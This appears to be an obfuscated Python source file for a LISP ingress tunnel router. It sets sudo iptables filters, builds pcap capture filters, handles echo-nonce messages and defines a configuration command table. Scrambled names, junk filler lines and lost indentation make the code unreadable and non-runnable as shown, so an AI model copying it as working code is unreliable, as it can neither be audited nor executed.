if 97 - 97: II111iiii % I1Ii111 + I1Ii111 - OoO0O00 / Ii1I * I1IiiI
if 17 - 17: Ii1I
if 39 - 39: ooOoO0o . II111iiii
if 45 - 45: oO0o * OoOoOO00 / iIii1I11I1II1
if 77 - 77: I1Ii111 - I11i
if ( lisp . lisp_pitr == False ) :
oo0i1iIIi1II1iiI = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}"
iiI1iI1I = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}"
for II11 in sources :
if ( lisp . lisp_is_mac_string ( II11 ) ) : continue
if ( II11 in dyn_eids ) : continue
I1IiI1iI11 = "" if II11 . find ( ":" ) == - 1 else "6"
for O0OOO0OOoO0O in sources :
if ( lisp . lisp_is_mac_string ( O0OOO0OOoO0O ) ) : continue
if ( O0OOO0OOoO0O in dyn_eids ) : continue
if ( O0OOO0OOoO0O . find ( "." ) != - 1 and II11 . find ( "." ) == - 1 ) : continue
if ( O0OOO0OOoO0O . find ( ":" ) != - 1 and II11 . find ( ":" ) == - 1 ) : continue
if ( commands . getoutput ( iiI1iI1I . format ( I1IiI1iI11 , II11 , O0OOO0OOoO0O ) ) == "" ) :
continue
if 27 - 27: I1ii11iIi11i * I1Ii111 - OoO0O00 + Ii1I * Ii1I
os . system ( oo0i1iIIi1II1iiI . format ( I1IiI1iI11 , II11 , O0OOO0OOoO0O ) )
if 55 - 55: ooOoO0o
if 82 - 82: I1Ii111 - OOooOOo + OoO0O00
if 64 - 64: o0oOOo0O0Ooo . O0 * Ii1I + OoooooooOO - Oo0Ooo . OoooooooOO
if 70 - 70: Oo0Ooo - oO0o . iIii1I11I1II1 % I11i / OoOoOO00 - O0
if 55 - 55: iII111i - OoO0O00
if 100 - 100: O0
if 79 - 79: iIii1I11I1II1
O00oO0o = "sudo ip{}tables -t raw -A lisp -j DROP -s {}"
for II11 in sources :
if ( lisp . lisp_is_mac_string ( II11 ) ) : continue
I1IiI1iI11 = "" if II11 . find ( ":" ) == - 1 else "6"
os . system ( O00oO0o . format ( I1IiI1iI11 , II11 ) )
if 15 - 15: I1Ii111 + I11i . OoooooooOO . i11iIiiIii
if 31 - 31: OoooooooOO + iII111i - OoOoOO00 . i1IIi % iII111i
if 43 - 43: OOooOOo * ooOoO0o / iIii1I11I1II1 - Ii1I * Ii1I
if 60 - 60: iIii1I11I1II1 . OOooOOo + I1ii11iIi11i
if 44 - 44: O0 . oO0o * i11iIiiIii % i11iIiiIii + O0 / OOooOOo
o00oOOO0Ooo = commands . getoutput ( "sudo iptables -t raw -S lisp" ) . split ( "\n" )
o00oOOO0Ooo += commands . getoutput ( "sudo ip6tables -t raw -S lisp" ) . split ( "\n" )
lisp . lprint ( "Using kernel filters: {}" . format ( o00oOOO0Ooo ) )
if 50 - 50: Ii1I - i11iIiiIii + iIii1I11I1II1 / O0 - Ii1I + o0oOOo0O0Ooo
if 22 - 22: II111iiii - Ii1I / ooOoO0o % OoooooooOO + OOooOOo
if 5 - 5: OoO0O00 / iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
if 46 - 46: IiII + oO0o
if 79 - 79: OoooooooOO - IiII * IiII . OoOoOO00
if ( os . getenv ( "LISP_VIRTIO_BUG" ) != None ) :
Oo00ooO0OoOo = ( "sudo iptables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
if 99 - 99: OoOoOO00
Oo00ooO0OoOo += ( "sudo iptables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill; " )
if 77 - 77: o0oOOo0O0Ooo
Oo00ooO0OoOo += ( "sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
Oo00ooO0OoOo += ( "sudo ip6tables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill" )
if 65 - 65: OoOoOO00
os . system ( Oo00ooO0OoOo )
I1iI11I1III1 = lisp . bold ( "virtio" , False )
lisp . lprint ( "{} bug workaround, configure '{}'" . format ( I1iI11I1III1 , Oo00ooO0OoOo ) )
if 8 - 8: i11iIiiIii / II111iiii + o0oOOo0O0Ooo * Ii1I % IiII . I11i
return
if 6 - 6: IiII % Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . i1IIi
if 99 - 99: OoOoOO00 . I1Ii111
if 59 - 59: I11i / Oo0Ooo / OOooOOo / O0 / OoOoOO00 + o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo % oO0o / I1Ii111 % I1Ii111 % O0
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
def o00oOo0oOoo ( sources , dyn_eids , l2_overlay , pitr ) :
if ( l2_overlay ) :
i1I11IiI1iiII = "ether[6:4] >= 0 and ether[10:2] >= 0"
lisp . lprint ( "Using pcap filter: '{}'" . format ( i1I11IiI1iiII ) )
return ( i1I11IiI1iiII )
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
if 79 - 79: OoOoOO00 / ooOoO0o
oOo00o = "(not ether proto 0x806)"
iI1iIIIi1i = " or (udp src port 4342 and ip[28] == 0x28)"
OOoooooooO = " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
if 4 - 4: Oo0Ooo + o0oOOo0O0Ooo
if 17 - 17: OoO0O00 * OoOoOO00
ii11i = ""
o00Oo = ""
for II11 in sources :
O000oOo = II11
if ( lisp . lisp_is_mac_string ( II11 ) ) :
O000oOo = II11 . split ( "/" ) [ 0 ]
O000oOo = O000oOo . replace ( "-" , "" )
IiiIIi1 = [ ]
for O00o00O in range ( 0 , 12 , 2 ) : IiiIIi1 . append ( O000oOo [ O00o00O : O00o00O + 2 ] )
O000oOo = "ether host " + ":" . join ( IiiIIi1 )
if 28 - 28: o0oOOo0O0Ooo
if 45 - 45: o0oOOo0O0Ooo . I1IiiI / I1Ii111 - Oo0Ooo * iIii1I11I1II1
ii11i += "{}" . format ( O000oOo )
if ( II11 not in dyn_eids ) : o00Oo += "{}" . format ( O000oOo )
if ( sources [ - 1 ] == II11 ) : break
ii11i += " or "
if ( II11 not in dyn_eids ) : o00Oo += " or "
if 86 - 86: II111iiii + ooOoO0o + IiII
if ( o00Oo [ - 4 : : ] == " or " ) : o00Oo = o00Oo [ 0 : - 4 ]
if 9 - 9: ooOoO0o + II111iiii % ooOoO0o % IiII + iIii1I11I1II1
if 59 - 59: i1IIi
if 48 - 48: O0 * Ii1I * OoO0O00 . OoO0O00 * I11i - Ii1I
if 14 - 14: I1ii11iIi11i + i11iIiiIii
if 83 - 83: I1ii11iIi11i / i11iIiiIii + II111iiii . iII111i * OOooOOo + IiII
if 42 - 42: i1IIi % II111iiii . ooOoO0o
II1II1iI = commands . getoutput ( "egrep 'lisp-nat = yes' ./lisp.config" )
II1II1iI = ( II1II1iI != "" and II1II1iI [ 0 ] == " " )
Ooo = lisp . lisp_get_loopback_address ( ) if ( II1II1iI ) else None
if 88 - 88: OoooooooOO
iIiI1I1ii1I1 = ""
O00oO = lisp . lisp_get_all_addresses ( )
for O0O00OooO in O00oO :
if ( O0O00OooO == Ooo ) : continue
iIiI1I1ii1I1 += "{}" . format ( O0O00OooO )
if ( O00oO [ - 1 ] == O0O00OooO ) : break
iIiI1I1ii1I1 += " or "
if 83 - 83: o0oOOo0O0Ooo
if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
if ( ii11i != "" ) :
ii11i = " and (src net {})" . format ( ii11i )
if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
if ( o00Oo != "" ) :
o00Oo = " and not (dst net {})" . format ( o00Oo )
if 48 - 48: iII111i + IiII
if ( iIiI1I1ii1I1 != "" ) :
iIiI1I1ii1I1 = " and not (dst host {})" . format ( iIiI1I1ii1I1 )
if 60 - 60: I11i + iII111i . IiII / i1IIi . iIii1I11I1II1
if 14 - 14: OOooOOo
if 79 - 79: Ii1I
if 76 - 76: iIii1I11I1II1
if 80 - 80: iIii1I11I1II1 . O0 / Ii1I % Ii1I
if 93 - 93: OoooooooOO * Oo0Ooo
if 10 - 10: I1Ii111 * OoooooooOO + I11i - I1ii11iIi11i / I1ii11iIi11i . i11iIiiIii
if ( pitr ) :
o00Oo = ""
iIiI1I1ii1I1 = iIiI1I1ii1I1 . replace ( "dst " , "" )
if 22 - 22: I1Ii111 / o0oOOo0O0Ooo
if 98 - 98: i1IIi
if 51 - 51: I1ii11iIi11i + ooOoO0o + Oo0Ooo / i1IIi + i1IIi
if 12 - 12: iIii1I11I1II1 . Ii1I . I1ii11iIi11i % I1IiiI . II111iiii . oO0o
if 32 - 32: I1ii11iIi11i + IiII / O0 / OoOoOO00 * OoooooooOO % ooOoO0o
i1I11IiI1iiII = oOo00o + ii11i + o00Oo + iIiI1I1ii1I1
i1I11IiI1iiII += iI1iIIIi1i
i1I11IiI1iiII += OOoooooooO
if 50 - 50: OoO0O00
lisp . lprint ( "Using pcap filter: '{}'" . format ( i1I11IiI1iiII ) )
return ( i1I11IiI1iiII )
if 66 - 66: iIii1I11I1II1
if 41 - 41: I1Ii111 . O0 * I1IiiI * I1ii11iIi11i
if 100 - 100: iII111i
if 73 - 73: I1ii11iIi11i % II111iiii
if 79 - 79: OoOoOO00 + OoO0O00 - II111iiii + Ii1I
if 11 - 11: oO0o + iIii1I11I1II1
if 10 - 10: O0
def Oo0000oOo ( device , pfilter , pcap_lock ) :
lisp . lisp_set_exception ( )
if 68 - 68: OOooOOo + oO0o . O0 . Ii1I % i1IIi % OOooOOo
pcap_lock . acquire ( )
i1I1iI = pcappy . open_live ( device , 9000 , 0 , 100 )
pcap_lock . release ( )
if 92 - 92: Oo0Ooo / i11iIiiIii + I1ii11iIi11i
i1I1iI . filter = pfilter
i1I1iI . loop ( - 1 , I11i1iIiiIiIi , device )
return
if 87 - 87: OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
def oOOoOOO0oo0 ( ) :
global I11
global II1Ii1iI1i
global II1iII1i
if 87 - 87: ooOoO0o / OoOoOO00 % o0oOOo0O0Ooo * oO0o
lisp . lisp_set_exception ( )
if 77 - 77: oO0o - Oo0Ooo - iIii1I11I1II1
if 16 - 16: OoO0O00 / iII111i / i1IIi . iII111i + oO0o
if 26 - 26: iIii1I11I1II1 + i1IIi / OoOoOO00 % I1ii11iIi11i
if 44 - 44: OoooooooOO . II111iiii . OOooOOo % OoooooooOO
if 86 - 86: i11iIiiIii + O0 * IiII - OoO0O00 * OOooOOo + O0
Oo0 = [ II1Ii1iI1i , II1Ii1iI1i ,
oO0oIIII ]
lisp . lisp_build_info_requests ( Oo0 , None , lisp . LISP_CTRL_PORT )
if 94 - 94: I1Ii111 % II111iiii * i1IIi * iIii1I11I1II1
if 81 - 81: Oo0Ooo - I11i
if 24 - 24: OoooooooOO . OoO0O00 * II111iiii
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
I11 . cancel ( )
I11 = threading . Timer ( lisp . LISP_INFO_INTERVAL ,
oOOoOOO0oo0 , [ ] )
I11 . start ( )
return
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
if 79 - 79: I1IiiI - ooOoO0o
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
if 83 - 83: IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
def O0000oO0o00 ( kv_pair ) :
global II1iII1i
global iiI1iIiI
global I11
if 80 - 80: OoooooooOO + IiII
lispconfig . lisp_map_resolver_command ( kv_pair )
if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ II1iII1i , iiI1iIiI ] )
lisp . lisp_test_mr_timer . start ( )
if 43 - 43: Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
I11 = threading . Timer ( 0 , oOOoOOO0oo0 , [ ] )
I11 . start ( )
return
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
if 100 - 100: I1ii11iIi11i * i11iIiiIii % oO0o / Oo0Ooo / ooOoO0o + I1ii11iIi11i
if 59 - 59: I1Ii111 - IiII
if 14 - 14: iIii1I11I1II1 - iIii1I11I1II1
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
def i1ii1iiIi1II ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
return
if 98 - 98: OoO0O00 - Ii1I . IiII % i11iIiiIii
if 69 - 69: I1ii11iIi11i + iII111i * O0 . OOooOOo % OoOoOO00
if 96 - 96: ooOoO0o . ooOoO0o - I11i / I11i
if 96 - 96: i11iIiiIii / I1IiiI - O0 . ooOoO0o
if 39 - 39: ooOoO0o / O0 * IiII
if 17 - 17: Ii1I / iIii1I11I1II1 - OoO0O00 + I1IiiI % OOooOOo
if 14 - 14: o0oOOo0O0Ooo % IiII + I1ii11iIi11i + OoO0O00
if 76 - 76: OoO0O00 - i11iIiiIii + OoOoOO00 + OOooOOo / OoooooooOO
def IiI1Iii1 ( kv_pair ) :
global i111I
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
iI11 = lisp . lisp_nat_traversal
OO0O00O = lisp . lisp_rloc_probing
if 31 - 31: i11iIiiIii
if 12 - 12: ooOoO0o
if 86 - 86: oO0o - OoO0O00
if 63 - 63: I1IiiI / OoOoOO00 + OoooooooOO . I11i . ooOoO0o
lispconfig . lisp_xtr_command ( kv_pair )
if 48 - 48: i1IIi - iII111i - i11iIiiIii . I11i - iII111i * I11i
if 60 - 60: OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
Oo0O0000Oo00o = ( iI11 == False and lisp . lisp_nat_traversal and lisp . lisp_rloc_probing )
if 20 - 20: OoO0O00 . I1IiiI * i11iIiiIii / i11iIiiIii
o00 = ( OO0O00O == False and lisp . lisp_rloc_probing )
if 4 - 4: OoO0O00
ooOO = 0
if ( o00 ) : ooOO = 1
if ( Oo0O0000Oo00o ) : ooOO = 5
if 5 - 5: OoooooooOO / o0oOOo0O0Ooo % I11i % OoO0O00 * iII111i + iIii1I11I1II1
if ( ooOO != 0 ) :
I11iiI11iiI = [ i111I , i111I ]
lisp . lisp_start_rloc_probe_timer ( ooOO , I11iiI11iiI )
if 51 - 51: oO0o . iIii1I11I1II1 + OoO0O00 * Ii1I + i1IIi
if 81 - 81: O0 - Ii1I + Oo0Ooo
if 67 - 67: Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if ( lisp . lisp_crypto_ephem_port == None and lisp . lisp_data_plane_security ) :
O00oooo00o0O = i111I . getsockname ( ) [ 1 ]
lisp . lisp_crypto_ephem_port = O00oooo00o0O
lisp . lprint ( "Use port {} for lisp-crypto packets" . format ( O00oooo00o0O ) )
i1I111Ii = { "type" : "itr-crypto-port" , "port" : O00oooo00o0O }
lisp . lisp_write_to_dp_socket ( i1I111Ii )
if 31 - 31: I1IiiI
if 73 - 73: ooOoO0o . O0 / o0oOOo0O0Ooo - OoooooooOO % i11iIiiIii
if 80 - 80: Ii1I / ooOoO0o % O0 . Oo0Ooo
if 63 - 63: OOooOOo . II111iiii . I11i
if 46 - 46: ooOoO0o % IiII - o0oOOo0O0Ooo - Oo0Ooo - Ii1I / I11i
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
if 68 - 68: i1IIi - I1ii11iIi11i / Oo0Ooo % I11i . iII111i
if 9 - 9: IiII
if 48 - 48: o0oOOo0O0Ooo + o0oOOo0O0Ooo - Oo0Ooo
if 27 - 27: OoO0O00 + OoOoOO00 * ooOoO0o
if 83 - 83: iIii1I11I1II1
if 72 - 72: I11i
if 87 - 87: i1IIi
if 48 - 48: Oo0Ooo * oO0o * iIii1I11I1II1 + i11iIiiIii - OoooooooOO
if 38 - 38: OoOoOO00 / iIii1I11I1II1 % i11iIiiIii - IiII * iII111i / OoOoOO00
def iIII11I1I1II ( ipc ) :
ii1IIiII111I , O00OoOoO , ooO0o0oo , O0O000OOOo = ipc . split ( "%" )
O0O000OOOo = int ( O0O000OOOo , 16 )
if 79 - 79: IiII % OoO0O00
Oo0oOO = lisp . lisp_get_echo_nonce ( None , ooO0o0oo )
if ( Oo0oOO == None ) : Oo0oOO = lisp . lisp_echo_nonce ( ooO0o0oo )
if 86 - 86: iIii1I11I1II1 / O0
if 17 - 17: II111iiii
if 9 - 9: OoooooooOO + oO0o
if 33 - 33: O0
if 39 - 39: I1IiiI + Oo0Ooo
if ( O00OoOoO == "R" ) :
Oo0oOO . request_nonce_rcvd = O0O000OOOo
Oo0oOO . last_request_nonce_rcvd = lisp . lisp_get_timestamp ( )
Oo0oOO . echo_nonce_sent = O0O000OOOo
Oo0oOO . last_new_echo_nonce_sent = lisp . lisp_get_timestamp ( )
lisp . lprint ( "Start echo-nonce mode for {}, nonce 0x{}" . format ( lisp . red ( Oo0oOO . rloc_str , False ) , lisp . lisp_hex_string ( O0O000OOOo ) ) )
if 83 - 83: i1IIi
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
if ( O00OoOoO == "E" ) :
Oo0oOO . echo_nonce_rcvd = O0O000OOOo
Oo0oOO . last_echo_nonce_rcvd = lisp . lisp_get_timestamp ( )
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
if ( Oo0oOO . request_nonce_sent == O0O000OOOo ) :
III1IiI1i1i = lisp . bold ( "echoed nonce" , False )
lisp . lprint ( "Received {} {} from {}" . format ( III1IiI1i1i ,
lisp . lisp_hex_string ( O0O000OOOo ) ,
lisp . red ( Oo0oOO . rloc_str , False ) ) )
if 94 - 94: iII111i - Oo0Ooo + oO0o
Oo0oOO . request_nonce_sent = None
lisp . lprint ( "Stop request-nonce mode for {}" . format ( lisp . red ( Oo0oOO . rloc_str , False ) ) )
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
Oo0oOO . last_good_echo_nonce_rcvd = lisp . lisp_get_timestamp ( )
else :
oO0o0Oo = "none"
if ( Oo0oOO . request_nonce_sent ) :
oO0o0Oo = lisp . lisp_hex_string ( Oo0oOO . request_nonce_sent )
if 76 - 76: ooOoO0o / OoOoOO00 + I1ii11iIi11i
lisp . lprint ( ( "Received echo-nonce 0x{} from {}, but request-" + "nonce is {}" ) . format ( lisp . lisp_hex_string ( O0O000OOOo ) ,
# OOooOOo
lisp . red ( Oo0oOO . rloc_str , False ) , oO0o0Oo ) )
if 65 - 65: OoOoOO00
if 91 - 91: IiII + Ii1I % Ii1I - O0 - i11iIiiIii
return
if 84 - 84: Oo0Ooo % iII111i % OoooooooOO + OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
I1IiII1I1i1I1 = {
"lisp xtr-parameters" : [ IiI1Iii1 , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"multi-tenant-eid" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-device" : [ True ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ O0000oO0o00 , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp map-server" : [ lispconfig . lisp_map_server_command , {
"ms-name" : [ True ] ,
"address" : [ True ] ,
"dns-name" : [ True ] ,
"authentication-type" : [ False , "sha1" , "sha2" ] ,
"authentication-key" : [ False ] ,
"encryption-key" : [ False ] ,
"proxy-reply" : [ False , "yes" , "no" ] ,
"want-map-notify" : [ False , "yes" , "no" ] ,
"merge-registrations" : [ False , "yes" , "no" ] ,
"refresh-registrations" : [ False , "yes" , "no" ] ,
"site-id" : [ False , 1 , 0xffffffffffffffff ] } ] ,
"lisp database-mapping" : [ i1ii1iiIi1II , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"register-ttl" : [ True , 1 , 0xffffffff ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"subscribe-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp itr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp geo-coordinates" : [ lispconfig . lisp_geo_command , {
"geo-name" : [ False ] ,
"geo-tag" : [ False ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"show itr-map-cache" : [ IIiiIiI1 , { } ] ,
"show itr-rloc-probing" : [ I1i1iii , { } ] ,
"show itr-keys" : [ oo , { } ] ,
"show itr-dynamic-eid" : [ lispconfig . lisp_show_dynamic_eid_command , { } ]
}
if 28 - 28: Oo0Ooo + IiII % II111iiii / OoO0O00 + i11iIiiIii
if 20 - 20: I1ii11iIi11i
if 3 - 3: OoO0O00 * i1IIi . I1IiiI . O0 - OoOoOO00
if 81 - 81: I1IiiI - iIii1I11I1II1 / I1IiiI / O0
if 34 - 34: Ii1I * Ii1I - I1ii11iIi11i - O0 . i11iIiiIii
if 32 - 32: iIii1I11I1II1 . OoO0O00 * oO0o / OOooOOo . II111iiii - Oo0Ooo
if ( I111I1Iiii1i ( ) == False ) :
lisp . lprint ( "lisp_itr_startup() failed" )
lisp . lisp_print_banner ( "ITR abnormal exit" )
exit ( 1 )
if 10 - 10: I1ii11iIi11i / i11iIiiIii - Ii1I + oO0o * I1IiiI
if 94 - 94: I1IiiI + iIii1I11I1II1 / O0 - OoooooooOO % I1ii11iIi11i
o0Oo0oo = [ i111I , oO0oIIII ,
II1Ii1iI1i , Oo0oO0oo0oO00 ]
if 44 - 44: I1IiiI % Ii1I * I1IiiI . Oo0Ooo + I1ii11iIi11i . OOooOOo
if 6 - 6: IiII * OoooooooOO + I1Ii111 / Ii1I
if 35 - 35: ooOoO0o % I1IiiI - ooOoO0o - OoO0O00 - OoooooooOO
if 46 - 46: i1IIi . i1IIi . oO0o / I11i / ooOoO0o
Ii1Iiii = True
Oo = [ i111I ] * 3
i1IIii11i1I1 = [ II1Ii1iI1i ] * 3
if 12 - 12: i1IIi / OOooOOo % ooOoO0o * IiII * O0 * iIii1I11I1II1
while ( True ) :
try : OOOO , oO , ii1IIiII111I = select . select ( o0Oo0oo , [ ] , [ ] )
except : break
if 19 - 19: I1IiiI % Ii1I . IiII * ooOoO0o
if 89 - 89: OoOoOO00 . OOooOOo
if 7 - 7: oO0o % OoOoOO00 - I1IiiI + Oo0Ooo
if 70 - 70: II111iiii + I1Ii111 + i11iIiiIii - i1IIi / IiII
if ( lisp . lisp_ipc_data_plane and Oo0oO0oo0oO00 in OOOO ) :
lisp . lisp_process_punt ( Oo0oO0oo0oO00 , II1iII1i ,
iiI1iIiI )
if 40 - 40: I1ii11iIi11i * I1Ii111
if 38 - 38: O0 . Oo0Ooo + OoOoOO00 - oO0o
if 43 - 43: iII111i + Oo0Ooo / OoooooooOO
if 24 - 24: O0 + o0oOOo0O0Ooo * Ii1I - I1Ii111
if 10 - 10: i11iIiiIii
if ( i111I in OOOO ) :
O00OoOoO , II11 , O00oooo00o0O , ii11iO000oo00OOOOO = lisp . lisp_receive ( Oo [ 0 ] ,
False )
if ( II11 == "" ) : break
if 52 - 52: Oo0Ooo . I11i / o0oOOo0O0Ooo + Ii1I % I11i
if ( lisp . lisp_is_rloc_probe_reply ( ii11iO000oo00OOOOO [ 0 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe reply, using pcap" )
continue
if 47 - 47: OoooooooOO / OOooOOo % OoO0O00 / Oo0Ooo - I1ii11iIi11i
lisp . lisp_parse_packet ( Oo , ii11iO000oo00OOOOO , II11 , O00oooo00o0O )
if 13 - 13: iII111i . I1IiiI * OOooOOo + Ii1I + I1IiiI - i11iIiiIii
if 79 - 79: ooOoO0o . oO0o / oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
